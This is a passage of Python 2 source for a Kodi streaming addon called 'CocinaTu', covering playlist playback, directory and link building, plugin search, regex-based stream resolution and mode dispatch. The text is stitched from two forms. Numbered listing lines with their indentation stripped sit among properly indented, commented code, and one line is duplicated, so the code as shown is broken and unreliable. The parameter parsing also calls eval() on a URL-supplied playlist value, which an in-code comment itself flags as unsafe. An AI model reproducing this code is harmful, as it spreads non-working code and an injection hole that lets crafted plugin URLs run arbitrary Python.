                liz = xbmcgui.ListItem(playname, iconImage=iconimage, thumbnailImage=iconimage)
                liz.setInfo(type='Video', infoLabels={'Title':playname})
                liz.setProperty("IsPlayable","true")
                liz.setPath(url2)
                xbmc.Player().play(url2,liz)

            else:
                url = mu_playlist[index]
                url=url.split('&regexs=')[0]
                liz = xbmcgui.ListItem(playname, iconImage=iconimage, thumbnailImage=iconimage)
                liz.setInfo(type='Video', infoLabels={'Title':playname})
                liz.setProperty("IsPlayable","true")
                liz.setPath(url)
                xbmc.Player().play(url,liz)
    elif not queueVideo:
        # queue every link and start the playlist from the top
        playlist.clear()
        item = 0
        for i in mu_playlist:
            item += 1
            info = xbmcgui.ListItem('%s) %s' %(str(item),name))
            try:
                if "$doregex" in i:
                    sepate = i.split('&regexs=')
                    url,setresolved = getRegexParsed(sepate[1], sepate[0])
                elif "&mode=19" in i:
                    url = urlsolver(i.replace('&mode=19','').replace(';',''))
                if url:
                    playlist.add(url, info)
                else:
                    raise
            except Exception:
                # resolution failed: queue the raw entry as-is
                playlist.add(i, info)
                pass

        xbmc.executebuiltin('playlist.playoffset(video,0)')
    else:
        # just append to the current video playlist without playing
        listitem = xbmcgui.ListItem(name)
        playlist.add(mu_playlist, listitem)
  2500.  
  2501.  
  2502. def download_file(name, url):
  2503.  
  2504. if addon.getSetting('save_location') == "":
  2505. xbmc.executebuiltin("XBMC.Notification('CocinaTu','Choose a location to save files.',15000,"+icon+")")
  2506. addon.openSettings()
  2507. params = {'url': url, 'download_path': addon.getSetting('save_location')}
  2508. downloader.download(name, params)
  2509. dialog = xbmcgui.Dialog()
  2510. ret = dialog.yesno('CocinaTu', 'Do you want to add this file as a source?')
  2511. if ret:
  2512. addSource(os.path.join(addon.getSetting('save_location'), name))
  2513.  
def _search(url,name):
    # Show a picker of known search-capable plugins and forward the query to
    # the chosen one through pluginquerybyJSON(). `url` and `name` arguments
    # are ignored except as overwritten locals.
    pluginsearchurls = ['plugin://plugin.video.genesis/?action=shows_search',\
    'plugin://plugin.video.genesis/?action=movies_search',\
    'plugin://plugin.video.salts/?mode=search&amp;section=Movies',\
    'plugin://plugin.video.salts/?mode=search&amp;section=TV',\
    'plugin://plugin.video.muchmovies.hd/?action=movies_search',\
    'plugin://plugin.video.viooz.co/?action=root_search',\
    'plugin://plugin.video.ororotv/?action=shows_search',\
    'plugin://plugin.video.yifymovies.hd/?action=movies_search',\
    'plugin://plugin.video.cartoonhdtwo/?description&amp;fanart&amp;iconimage&amp;mode=3&amp;name=Search&amp;url=url',\
    'plugin://plugin.video.youtube/kodion/search/list/',\
    'plugin://plugin.video.dailymotion_com/?mode=search&amp;url',\
    'plugin://plugin.video.vimeo/kodion/search/list/'\
    ]
    # display names, index-aligned with pluginsearchurls above
    names = ['Gensis TV','Genesis Movie','Salt movie','salt TV','Muchmovies','viooz','ORoroTV',\
    'Yifymovies','cartoonHD','Youtube','DailyMotion','Vimeo']
    dialog = xbmcgui.Dialog()
    index = dialog.select('Choose a video source', names)

    if index >= 0:
        url = pluginsearchurls[index]
        pluginquerybyJSON(url)
  2538.  
def addDir(name,url,mode,iconimage,fanart,description,genre,date,credits,showcontext=False,regexs=None,reg_url=None,allinfo={}):
    # Add one folder entry to the Kodi directory listing, building the
    # plugin callback URL from url/mode/name/fanart (+regexs when given) and
    # attaching context-menu actions depending on `showcontext`
    # ('source' / 'download' / 'fav' / '!!update').
    # Returns the result of xbmcplugin.addDirectoryItem.
    # NOTE: the mutable default `allinfo={}` is shared between calls - it is
    # only read here, so this is safe as long as callers never mutate it.
    if regexs and len(regexs)>0:
        u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&fanart="+urllib.quote_plus(fanart)+"&regexs="+regexs
    else:
        u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&fanart="+urllib.quote_plus(fanart)

    ok=True
    if date == '':
        date = None
    else:
        description += '\n\nDate: %s' %date
    liz=xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=iconimage)
    if len(allinfo) <1 :
        liz.setInfo(type="Video", infoLabels={ "Title": name, "Plot": description, "Genre": genre, "dateadded": date, "credits": credits })
    else:
        liz.setInfo(type="Video", infoLabels= allinfo)
    liz.setProperty("Fanart_Image", fanart)
    if showcontext:
        contextMenu = []
        parentalblock =addon.getSetting('parentalblocked')
        parentalblock= parentalblock=="true"
        parentalblockedpin =addon.getSetting('parentalblockedpin')
        if len(parentalblockedpin)>0:
            # toggle entry for the parental lock (mode 55 locks, 56 unlocks)
            if parentalblock:
                contextMenu.append(('CocinaTu Activar Bloqueo Parental','XBMC.RunPlugin(%s?mode=55&name=%s)' %(sys.argv[0], urllib.quote_plus(name))))
            else:
                contextMenu.append(('CocinaTu Bloqueo Parental Desactivado','XBMC.RunPlugin(%s?mode=56&name=%s)' %(sys.argv[0], urllib.quote_plus(name))))

        if showcontext == 'source':

            if name in str(SOURCES):
                contextMenu.append(('Remove from Sources','XBMC.RunPlugin(%s?mode=8&name=%s)' %(sys.argv[0], urllib.quote_plus(name))))


        elif showcontext == 'download':
            contextMenu.append(('Download','XBMC.RunPlugin(%s?url=%s&mode=9&name=%s)'
            %(sys.argv[0], urllib.quote_plus(url), urllib.quote_plus(name))))
        elif showcontext == 'fav':
            contextMenu.append(('Borrar de Favoritos CocinaTu','XBMC.RunPlugin(%s?mode=6&name=%s)'
            %(sys.argv[0], urllib.quote_plus(name))))
        if showcontext == '!!update':
            fav_params2 = (
            '%s?url=%s&mode=17&regexs=%s'
            %(sys.argv[0], urllib.quote_plus(reg_url), regexs)
            )
            contextMenu.append(('[COLOR gold]CocinaTu[/COLOR]','XBMC.RunPlugin(%s)' %fav_params2))
        if not name in FAV:
            contextMenu.append(('Agregar a Favoritos de CocinaTu','XBMC.RunPlugin(%s?mode=5&name=%s&url=%s&iconimage=%s&fanart=%s&fav_mode=%s)'
            %(sys.argv[0], urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(iconimage), urllib.quote_plus(fanart), mode)))
        liz.addContextMenuItems(contextMenu)
    ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=True)
    return ok
  2595. def ytdl_download(url,title,media_type='video'):
  2596. # play in xbmc while playing go back to contextMenu(c) to "!!Download!!"
  2597. # Trial yasceen: seperate |User-Agent=
  2598. import youtubedl
  2599.  
  2600. if not url == '':
  2601. if media_type== 'audio':
  2602. youtubedl.single_YD(url,download=True,audio=True)
  2603. else:
  2604. youtubedl.single_YD(url,download=True)
  2605. elif xbmc.Player().isPlaying() == True :
  2606. import YDStreamExtractor
  2607. if YDStreamExtractor.isDownloading() == True:
  2608.  
  2609. YDStreamExtractor.manageDownloads()
  2610. else:
  2611. xbmc_url = xbmc.Player().getPlayingFile()
  2612.  
  2613. xbmc_url = xbmc_url.split('|User-Agent=')[0]
  2614. info = {'url':xbmc_url,'title':title,'media_type':media_type}
  2615. youtubedl.single_YD('',download=True,dl_info=info)
  2616. else:
  2617. xbmc.executebuiltin("XBMC.Notification(DOWNLOAD,First Play [COLOR yellow]WHILE playing download[/COLOR] ,10000)")
  2618.  
  2619. ## Lunatixz PseudoTV feature
  2620. def ascii(string):
  2621. if isinstance(string, basestring):
  2622. if isinstance(string, unicode):
  2623. string = string.encode('ascii', 'ignore')
  2624. return string
  2625. def uni(string, encoding = 'utf-8'):
  2626. if isinstance(string, basestring):
  2627. if not isinstance(string, unicode):
  2628. string = unicode(string, encoding, 'ignore')
  2629. return string
  2630. def removeNonAscii(s): return "".join(filter(lambda x: ord(x)<128, s))
  2631.  
  2632. def sendJSON( command):
  2633. data = ''
  2634. try:
  2635. data = xbmc.executeJSONRPC(uni(command))
  2636. except UnicodeEncodeError:
  2637. data = xbmc.executeJSONRPC(ascii(command))
  2638.  
  2639. return uni(data)
  2640.  
  2641. def pluginquerybyJSON(url,give_me_result=None,playlist=False):
  2642. if 'audio' in url:
  2643. json_query = uni('{"jsonrpc":"2.0","method":"Files.GetDirectory","params": {"directory":"%s","media":"video", "properties": ["title", "album", "artist", "duration","thumbnail", "year"]}, "id": 1}') %url
  2644. else:
  2645. json_query = uni('{"jsonrpc":"2.0","method":"Files.GetDirectory","params":{"directory":"%s","media":"video","properties":[ "plot","playcount","director", "genre","votes","duration","trailer","premiered","thumbnail","title","year","dateadded","fanart","rating","season","episode","studio","mpaa"]},"id":1}') %url
  2646. json_folder_detail = json.loads(sendJSON(json_query))
  2647. #print json_folder_detail
  2648. if give_me_result:
  2649. return json_folder_detail
  2650. if json_folder_detail.has_key('error'):
  2651. return
  2652. else:
  2653.  
  2654. for i in json_folder_detail['result']['files'] :
  2655. meta ={}
  2656. url = i['file']
  2657. name = removeNonAscii(i['label'])
  2658. thumbnail = removeNonAscii(i['thumbnail'])
  2659. fanart = removeNonAscii(i['fanart'])
  2660. meta = dict((k,v) for k, v in i.iteritems() if not v == '0' or not v == -1 or v == '')
  2661. meta.pop("file", None)
  2662. if i['filetype'] == 'file':
  2663. if playlist:
  2664. play_playlist(name,url,queueVideo='1')
  2665. continue
  2666. else:
  2667. addLink(url,name,thumbnail,fanart,'','','','',None,'',total=len(json_folder_detail['result']['files']),allinfo=meta)
  2668. #xbmc.executebuiltin("Container.SetViewMode(500)")
  2669. if i['type'] and i['type'] == 'tvshow' :
  2670. xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')
  2671. elif i['episode'] > 0 :
  2672. xbmcplugin.setContent(int(sys.argv[1]), 'episodes')
  2673.  
  2674. else:
  2675. addDir(name,url,53,thumbnail,fanart,'','','','',allinfo=meta)
  2676. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  2677.  
def addLink(url,name,iconimage,fanart,description,genre,date,showcontext,playlist,regexs,total,setCookie="",allinfo={}):
    """Add a playable item to the Kodi directory listing.

    Picks the playback mode from the url/regexs shape (17 regex, 19 host
    resolver, 18 youtube-dl, 12 direct/magnet), builds the plugin://
    callback url, sets IsPlayable where appropriate and attaches
    download / favorites / parental-lock context-menu entries.

    Returns the boolean result of xbmcplugin.addDirectoryItem().
    """
    contextMenu =[]
    parentalblock =addon.getSetting('parentalblocked')
    parentalblock= parentalblock=="true"
    parentalblockedpin =addon.getSetting('parentalblockedpin')
    # Parental lock toggle is only offered when a PIN is configured.
    if len(parentalblockedpin)>0:
        if parentalblock:
            contextMenu.append(('CocinaTu Activar Bloqueo Parental','XBMC.RunPlugin(%s?mode=55&name=%s)' %(sys.argv[0], urllib.quote_plus(name))))
        else:
            contextMenu.append(('CocinaTu Desactivar Bloqueo Parental','XBMC.RunPlugin(%s?mode=56&name=%s)' %(sys.argv[0], urllib.quote_plus(name))))

    try:
        name = name.encode('utf-8')
    except: pass
    ok = True
    isFolder=False
    # --- Mode selection: decide which handler will play this url. -----
    if regexs:
        mode = '17'
        if 'listrepeat' in regexs:
            # listrepeat regexes expand into a sub-listing, so render as folder.
            isFolder=True
        contextMenu.append(('[COLOR white]!!Download Currently Playing!![/COLOR]','XBMC.RunPlugin(%s?url=%s&mode=21&name=%s)'
                            %(sys.argv[0], urllib.quote_plus(url), urllib.quote_plus(name))))
    elif (any(x in url for x in resolve_url) and url.startswith('http')) or url.endswith('&mode=19'):
        # Known file-host: route through the url resolver (mode 19).
        url=url.replace('&mode=19','')
        mode = '19'
        contextMenu.append(('[COLOR white]!!Download Currently Playing!![/COLOR]','XBMC.RunPlugin(%s?url=%s&mode=21&name=%s)'
                            %(sys.argv[0], urllib.quote_plus(url), urllib.quote_plus(name))))
    elif url.endswith('&mode=18'):
        # Explicit youtube-dl marker.
        url=url.replace('&mode=18','')
        mode = '18'
        contextMenu.append(('[COLOR white]!!Download!![/COLOR]','XBMC.RunPlugin(%s?url=%s&mode=23&name=%s)'
                            %(sys.argv[0], urllib.quote_plus(url), urllib.quote_plus(name))))
        if addon.getSetting('dlaudioonly') == 'true':
            contextMenu.append(('!!Download [COLOR seablue]Audio!![/COLOR]','XBMC.RunPlugin(%s?url=%s&mode=24&name=%s)'
                                %(sys.argv[0], urllib.quote_plus(url), urllib.quote_plus(name))))
    elif url.startswith('magnet:?xt='):
        # Magnet links are handed off to the Pulsar torrent plugin.
        if '&' in url and not '&amp;' in url :
            url = url.replace('&','&amp;')
        url = 'plugin://plugin.video.pulsar/play?uri=' + url
        mode = '12'
    else:
        # Anything else plays directly via setResolvedUrl (mode 12).
        mode = '12'
        contextMenu.append(('[COLOR white]!!Download Currently Playing!![/COLOR]','XBMC.RunPlugin(%s?url=%s&mode=21&name=%s)'
                            %(sys.argv[0], urllib.quote_plus(url), urllib.quote_plus(name))))
        if 'plugin://plugin.video.youtube/play/?video_id=' in url:
            # Map the plugin url back to a plain YouTube url for audio rips.
            yt_audio_url = url.replace('plugin://plugin.video.youtube/play/?video_id=','https://www.youtube.com/watch?v=')
            contextMenu.append(('!!Download [COLOR blue]Audio!![/COLOR]','XBMC.RunPlugin(%s?url=%s&mode=24&name=%s)'
                                %(sys.argv[0], urllib.quote_plus(yt_audio_url), urllib.quote_plus(name))))
    # --- Build the callback url. ---------------------------------------
    u=sys.argv[0]+"?"
    play_list = False
    if playlist:
        if addon.getSetting('add_playlist') == "false" and '$$LSPlayOnlyOne$$' not in playlist[0] :
            u += "url="+urllib.quote_plus(url)+"&mode="+mode
        else:
            # ',' is escaped as '||' so the list survives url encoding.
            u += "mode=13&name=%s&playlist=%s" %(urllib.quote_plus(name), urllib.quote_plus(str(playlist).replace(',','||')))
            name = name + '[COLOR magenta] (' + str(len(playlist)) + ' items )[/COLOR]'
            play_list = True
    else:
        u += "url="+urllib.quote_plus(url)+"&mode="+mode
    if regexs:
        u += "&regexs="+regexs
    if not setCookie == '':
        u += "&setCookie="+urllib.quote_plus(setCookie)
    if iconimage and not iconimage == '':
        u += "&iconimage="+urllib.quote_plus(iconimage)

    if date == '':
        date = None
    else:
        description += '\n\nDate: %s' %date
    liz=xbmcgui.ListItem(name, iconImage="DefaultVideo.png", thumbnailImage=iconimage)
    if allinfo==None or len(allinfo) <1:
        liz.setInfo(type="Video", infoLabels={ "Title": name, "Plot": description, "Genre": genre, "dateadded": date })
    else:
        liz.setInfo(type="Video", infoLabels=allinfo)
    liz.setProperty("Fanart_Image", fanart)

    # IsPlayable is skipped for playlists, proxied urls and anything in
    # g_ignoreSetResolved, since those are run as plugins, not resolved.
    if (not play_list) and not any(x in url for x in g_ignoreSetResolved) and not '$PLAYERPROXY$=' in url:
        if regexs:
            if '$pyFunction:playmedia(' not in urllib.unquote_plus(regexs) and 'notplayable' not in urllib.unquote_plus(regexs) and 'listrepeat' not in urllib.unquote_plus(regexs) :
                liz.setProperty('IsPlayable', 'true')
        else:
            liz.setProperty('IsPlayable', 'true')
    else:
        addon_log( 'NOT setting isplayable'+url)
    if showcontext:
        if showcontext == 'fav':
            contextMenu.append(
                ('Borrado de Favortitos de CocinaTu','XBMC.RunPlugin(%s?mode=6&name=%s)'
                %(sys.argv[0], urllib.quote_plus(name)))
            )
        elif not name in FAV:
            # Fall back to explicit utf-8 encoding if quoting raw values fails.
            try:
                fav_params = (
                    '%s?mode=5&name=%s&url=%s&iconimage=%s&fanart=%s&fav_mode=0'
                    %(sys.argv[0], urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(iconimage), urllib.quote_plus(fanart))
                )
            except:
                fav_params = (
                    '%s?mode=5&name=%s&url=%s&iconimage=%s&fanart=%s&fav_mode=0'
                    %(sys.argv[0], urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(iconimage.encode("utf-8")), urllib.quote_plus(fanart.encode("utf-8")))
                )
            if playlist:
                fav_params += 'playlist='+urllib.quote_plus(str(playlist).replace(',','||'))
            if regexs:
                fav_params += "&regexs="+regexs
            contextMenu.append(('Agregar a favoritos de CocinaTu','XBMC.RunPlugin(%s)' %fav_params))
    liz.addContextMenuItems(contextMenu)
    # Optional 'Play ... PlayList' entry when playlist items are listed
    # individually; name.split(') ') assumes a '(N) title' label format.
    try:
        if not playlist is None:
            if addon.getSetting('add_playlist') == "false":
                playlist_name = name.split(') ')[1]
                contextMenu_ = [
                    ('Play '+playlist_name+' PlayList','XBMC.RunPlugin(%s?mode=13&name=%s&playlist=%s)'
                    %(sys.argv[0], urllib.quote_plus(playlist_name), urllib.quote_plus(str(playlist).replace(',','||'))))
                ]
                liz.addContextMenuItems(contextMenu_)
    except: pass
    ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,totalItems=total,isFolder=isFolder)
    return ok
  2808.  
  2809.  
  2810. def playsetresolved(url,name,iconimage,setresolved=True,reg=None):
  2811. print 'playsetresolved',url,setresolved
  2812. if url==None:
  2813. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  2814. return
  2815. if setresolved:
  2816. setres=True
  2817. if '$$LSDirect$$' in url:
  2818. url=url.replace('$$LSDirect$$','')
  2819. setres=False
  2820. if reg and 'notplayable' in reg:
  2821. setres=False
  2822.  
  2823. liz = xbmcgui.ListItem(name, iconImage=iconimage, thumbnailImage=iconimage)
  2824. liz.setInfo(type='Video', infoLabels={'Title':name})
  2825. liz.setProperty("IsPlayable","true")
  2826. liz.setPath(url)
  2827. if not setres:
  2828. xbmc.Player().play(url)
  2829. else:
  2830. xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, liz)
  2831.  
  2832. else:
  2833. xbmc.executebuiltin('XBMC.RunPlugin('+url+')')
  2834.  
  2835.  
  2836. ## Thanks to daschacka, an epg scraper for http://i.teleboy.ch/programm/station_select.php
  2837. ## http://forum.xbmc.org/post.php?p=936228&postcount=1076
  2838. def getepg(link):
  2839. url=urllib.urlopen(link)
  2840. source=url.read()
  2841. url.close()
  2842. source2 = source.split("Jetzt")
  2843. source3 = source2[1].split('programm/detail.php?const_id=')
  2844. sourceuhrzeit = source3[1].split('<br /><a href="/')
  2845. nowtime = sourceuhrzeit[0][40:len(sourceuhrzeit[0])]
  2846. sourcetitle = source3[2].split("</a></p></div>")
  2847. nowtitle = sourcetitle[0][17:len(sourcetitle[0])]
  2848. nowtitle = nowtitle.encode('utf-8')
  2849. return " - "+nowtitle+" - "+nowtime
  2850.  
  2851.  
  2852. def get_epg(url, regex):
  2853. data = makeRequest(url)
  2854. try:
  2855. item = re.findall(regex, data)[0]
  2856. return item
  2857. except:
  2858. addon_log('regex failed')
  2859. addon_log(regex)
  2860. return
  2861.  
  2862.  
##not a generic implemenation as it needs to convert
def d2x(d, root="root",nested=0):
    """Serialise the nested regex dict *d* back into <regex>...</regex> XML.

    Top-level keys are all renamed to 'regex'; list values emit one
    element per entry; nested dicts recurse without their own root
    wrapper, tagged by the current key.
    """
    op = lambda tag: '<' + tag + '>'
    cl = lambda tag: '</' + tag + '>\n'

    # NOTE: ml deliberately closes over the loop variable `key` (late
    # binding) so each value is wrapped in the tag currently iterated.
    ml = lambda v,xml: xml + op(key) + str(v) + cl(key)
    xml = op(root) + '\n' if root else ""

    for key,vl in d.iteritems():
        vtype = type(vl)
        if nested==0: key='regex' #enforcing all top level tags to be named as regex
        if vtype is list:
            for v in vl:
                v=escape(v)
                xml = ml(v,xml)

        if vtype is dict:
            # Recurse with root=None; the enclosing key acts as wrapper.
            xml = ml('\n' + d2x(vl,None,nested+1),xml)
        if vtype is not list and vtype is not dict:
            if not vl is None: vl=escape(vl)
            if vl is None:
                xml = ml(vl,xml)
            else:
                # Scalars are utf-8 encoded byte strings in the output.
                xml = ml(vl.encode("utf-8"),xml)

    xml += cl(root) if root else ""

    return xml
  2894. xbmcplugin.setContent(int(sys.argv[1]), 'movies')
  2895.  
  2896. try:
  2897. xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_UNSORTED)
  2898. except:
  2899. pass
  2900. try:
  2901. xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_LABEL)
  2902. except:
  2903. pass
  2904. try:
  2905. xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_DATE)
  2906. except:
  2907. pass
  2908. try:
  2909. xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_GENRE)
  2910. except:
  2911. pass
  2912.  
# --- Plugin invocation parameters ------------------------------------------
# get_params() returns the parsed plugin:// query string. Every value is
# optional, so each lookup is wrapped in try/except and falls back to the
# defaults initialised below.
params=get_params()

url=None
name=None
mode=None
playlist=None
iconimage=None
fanart=FANART
playlist=None
fav_mode=None
regexs=None

try:
    url=urllib.unquote_plus(params["url"]).decode('utf-8')
except:
    pass
try:
    name=urllib.unquote_plus(params["name"])
except:
    pass
try:
    iconimage=urllib.unquote_plus(params["iconimage"])
except:
    pass
try:
    fanart=urllib.unquote_plus(params["fanart"])
except:
    pass
try:
    mode=int(params["mode"])
except:
    pass
try:
    # The playlist travels as a repr()'d Python list with ',' escaped as
    # '||'; eval() reverses that. NOTE(review): eval on url-supplied data
    # is unsafe - confirm the parameter can only come from this addon.
    playlist=eval(urllib.unquote_plus(params["playlist"]).replace('||',','))
except:
    pass
try:
    fav_mode=int(params["fav_mode"])
except:
    pass
try:
    regexs=params["regexs"]
except:
    pass
playitem=''
try:
    playitem=urllib.unquote_plus(params["playitem"])
except:
    pass

addon_log("Mode: "+str(mode))


if not url is None:
    addon_log("URL: "+str(url.encode('utf-8')))
addon_log("Name: "+str(name))

# A raw <item> XML blob passed as 'playitem' is parsed directly and routed
# to the regex player (mode 117).
if not playitem =='':
    s=getSoup('',data=playitem)
    name,url,regexs=getItems(s,None,dontLink=True)
    mode=117
  2973. mode=117
# --- Mode dispatch ----------------------------------------------------------
# Route the invocation on the 'mode' query parameter. No mode at all means
# the addon root: show the source list plus the disclaimer dialog.
if mode==None:

    import xbmc
    xbmc.executebuiltin("XBMC.Notification(CocinaTu,Ultima Version: 0.0.1, 7000,"+icon+")")


    addon_log("getSources")
    getSources()
    xbmcplugin.endOfDirectory(int(sys.argv[1]))

    __addon__ = xbmcaddon.Addon()
    __addonname__ = __addon__.getAddonInfo('name')

    # Disclaimer dialog shown on every visit to the root listing.
    line1 = "Este addon es Totalmente gratuito. CocinaTu no contiene ningún archivo Propio Todos Los que Hay Son"
    line2 = "Recolectados de internet, CocinaTu no se hacen responsable de dicho contenido "
    line3 = "Ni del uso no responsable del mismo. El copyright de las imágenes pertenece a sus respectivos autores y/o productoras/distribuidoras."
    xbmcgui.Dialog().ok(__addonname__, line1, line2, line3)


elif mode==1:
    # Render a source file/URL as a directory listing.
    addon_log("getData")

    data=None

    if regexs and len(regexs)>0:
        data,setresolved=getRegexParsed(regexs, url)
        # If the regex yielded a direct location, treat it as the url and
        # let getData fetch it rather than parse the blob as XML.
        if data.startswith('http') or data.startswith('smb') or data.startswith('nfs') or data.startswith('/'):
            url=data
            data=None

    getData(url,fanart,data)
    xbmcplugin.endOfDirectory(int(sys.argv[1]))


elif mode==2:
    addon_log("getChannelItems")
    getChannelItems(name,url,fanart)
    xbmcplugin.endOfDirectory(int(sys.argv[1]))

elif mode==3:
    addon_log("getSubChannelItems")
    getSubChannelItems(name,url,fanart)
    xbmcplugin.endOfDirectory(int(sys.argv[1]))

elif mode==4:
    addon_log("getFavorites")
    getFavorites()
    xbmcplugin.endOfDirectory(int(sys.argv[1]))

elif mode==5:
    # Add a favorite; strip the list decoration off the visible name first.
    addon_log("addFavorite")
    try:
        name = name.split('\\ ')[1]
    except:
        pass
    try:
        name = name.split(' - ')[0]
    except:
        pass
    addFavorite(name,url,iconimage,fanart,fav_mode)

elif mode==6:
    # Remove a favorite (same name normalisation as mode 5).
    addon_log("rmFavorite")
    try:
        name = name.split('\\ ')[1]
    except:
        pass
    try:
        name = name.split(' - ')[0]
    except:
        pass
    rmFavorite(name)

elif mode==7:
    SportsDevil()
    Dutch()

elif mode==8:
    addon_log("rmSource")
    rmSource(name)

elif mode==9:
    addon_log("download_file")
    download_file(name, url)

elif mode==10:
    addon_log("getCommunitySources")
    getCommunitySources()

elif mode==11:
    addon_log("addSource")
    addSource(url)

elif mode==12:
    # Direct playback: resolve the url for the waiting IsPlayable item,
    # unless it is a plugin:// url that must be run instead.
    addon_log("setResolvedUrl")
    if not url.startswith("plugin://plugin") or not any(x in url for x in g_ignoreSetResolved):
        setres=True
        if '$$LSDirect$$' in url:
            # $$LSDirect$$ marker: bypass setResolvedUrl and play directly.
            url=url.replace('$$LSDirect$$','')
            setres=False
        item = xbmcgui.ListItem(path=url)
        if not setres:
            xbmc.Player().play(url)
        else:
            xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
    else:
        xbmc.executebuiltin('XBMC.RunPlugin('+url+')')


elif mode==13:
    addon_log("play_playlist")
    play_playlist(name, playlist)

elif mode==14:
    addon_log("get_xml_database")
    get_xml_database(url)
    xbmcplugin.endOfDirectory(int(sys.argv[1]))

elif mode==15:
    addon_log("browse_xml_database")
    get_xml_database(url, True)
    xbmcplugin.endOfDirectory(int(sys.argv[1]))

elif mode==16:
    addon_log("browse_community")
    getCommunitySources(url,browse=True)
    xbmcplugin.endOfDirectory(int(sys.argv[1]))

elif mode==17 or mode==117:
    # Regex-driven item: either expand a 'listrepeat' template into many
    # generated directory entries, or resolve a single playable url.
    addon_log("getRegexParsed")

    data=None
    if regexs and 'listrepeat' in urllib.unquote_plus(regexs):
        listrepeat,ret,m,regexs, cookieJar =getRegexParsed(regexs, url)
        d=''
        regexname=m['name']
        existing_list=regexs.pop(regexname)
        url=''
        import copy
        ln=''
        rnumber=0
        # For every capture produced by the listrepeat regex, substitute
        # the [name.paramN] placeholders into the remaining regexes and
        # into the listrepeat item template.
        for obj in ret:
            try:
                rnumber+=1
                newcopy=copy.deepcopy(regexs)
                listrepeatT=listrepeat
                i=0
                for i in range(len(obj)):
                    if len(newcopy)>0:
                        for the_keyO, the_valueO in newcopy.iteritems():
                            if the_valueO is not None:
                                for the_key, the_value in the_valueO.iteritems():
                                    if the_value is not None:
                                        if type(the_value) is dict:
                                            # One extra nesting level (e.g. headers dicts).
                                            for the_keyl, the_valuel in the_value.iteritems():
                                                if the_valuel is not None:
                                                    # Decode the capture to unicode when possible.
                                                    val=None
                                                    if isinstance(obj,tuple):
                                                        try:
                                                            val= obj[i].decode('utf-8')
                                                        except:
                                                            val= obj[i]
                                                    else:
                                                        try:
                                                            val= obj.decode('utf-8')
                                                        except:
                                                            val= obj

                                                    # The [..][DE] suffix substitutes the HTML-unescaped value.
                                                    if '[' + regexname+'.param'+str(i+1) + '][DE]' in the_valuel:
                                                        the_valuel=the_valuel.replace('[' + regexname+'.param'+str(i+1) + '][DE]', unescape(val))
                                                    the_value[the_keyl]=the_valuel.replace('[' + regexname+'.param'+str(i+1) + ']', val)
                                        else:
                                            val=None
                                            if isinstance(obj,tuple):
                                                try:
                                                    val=obj[i].decode('utf-8')
                                                except:
                                                    val=obj[i]
                                            else:
                                                try:
                                                    val= obj.decode('utf-8')
                                                except:
                                                    val= obj
                                            if '[' + regexname+'.param'+str(i+1) + '][DE]' in the_value:
                                                the_value=the_value.replace('[' + regexname+'.param'+str(i+1) + '][DE]', unescape(val))

                                            the_valueO[the_key]=the_value.replace('[' + regexname+'.param'+str(i+1) + ']', val)

                    # Substitute into the listrepeat item template as well
                    # (XML-escaped by default, raw with the [DE] marker).
                    val=None
                    if isinstance(obj,tuple):
                        try:
                            val=obj[i].decode('utf-8')
                        except:
                            val=obj[i]
                    else:
                        try:
                            val=obj.decode('utf-8')
                        except:
                            val=obj
                    if '[' + regexname+'.param'+str(i+1) + '][DE]' in listrepeatT:
                        listrepeatT=listrepeatT.replace('[' + regexname+'.param'+str(i+1) + '][DE]',val)
                    listrepeatT=listrepeatT.replace('[' + regexname+'.param'+str(i+1) + ']',escape(val))
                # param0 is the 1-based row number of the match.
                listrepeatT=listrepeatT.replace('[' + regexname+'.param'+str(0) + ']',str(rnumber))

                try:
                    if cookieJar and '[' + regexname+'.cookies]' in listrepeatT:
                        listrepeatT=listrepeatT.replace('[' + regexname+'.cookies]',getCookiesString(cookieJar))
                except: pass

                # Re-serialise the substituted regexes for the generated item.
                regex_xml=''
                if len(newcopy)>0:
                    regex_xml=d2x(newcopy,'lsproroot')
                    regex_xml=regex_xml.split('<lsproroot>')[1].split('</lsproroot')[0]

                try:
                    ln+='\n<item>%s\n%s</item>'%(listrepeatT,regex_xml)
                except: ln+='\n<item>%s\n%s</item>'%(listrepeatT.encode("utf-8"),regex_xml)
            except: traceback.print_exc(file=sys.stdout)

        addon_log(repr(ln))
        # Feed the generated XML straight back through the directory builder.
        getData('','',ln)
        xbmcplugin.endOfDirectory(int(sys.argv[1]))
    else:
        url,setresolved = getRegexParsed(regexs, url)
        print repr(url),setresolved,'imhere'
        # Skip silently when 'notplayable' with no url is the intended outcome.
        if not (regexs and 'notplayable' in regexs and not url):
            if url:
                if '$PLAYERPROXY$=' in url:
                    # The url carries an embedded proxy spec:
                    # user:pass@ip:port or plain ip:port.
                    url,proxy=url.split('$PLAYERPROXY$=')
                    print 'proxy',proxy
                    #Jairox mod for proxy auth
                    proxyuser = None
                    proxypass = None
                    if len(proxy) > 0 and '@' in proxy:
                        proxy = proxy.split(':')
                        proxyuser = proxy[0]
                        proxypass = proxy[1].split('@')[0]
                        proxyip = proxy[1].split('@')[1]
                        port = proxy[2]
                    else:
                        proxyip,port=proxy.split(':')

                    playmediawithproxy(url,name,iconimage,proxyip,port, proxyuser,proxypass) #jairox
                else:
                    playsetresolved(url,name,iconimage,setresolved,regexs)
            else:
                xbmc.executebuiltin("XBMC.Notification(CocinaTu,Failed to extract regex. - "+"this"+",4000,"+icon+")")
elif mode==18:
    # Resolve the stream through the youtube-dl service module.
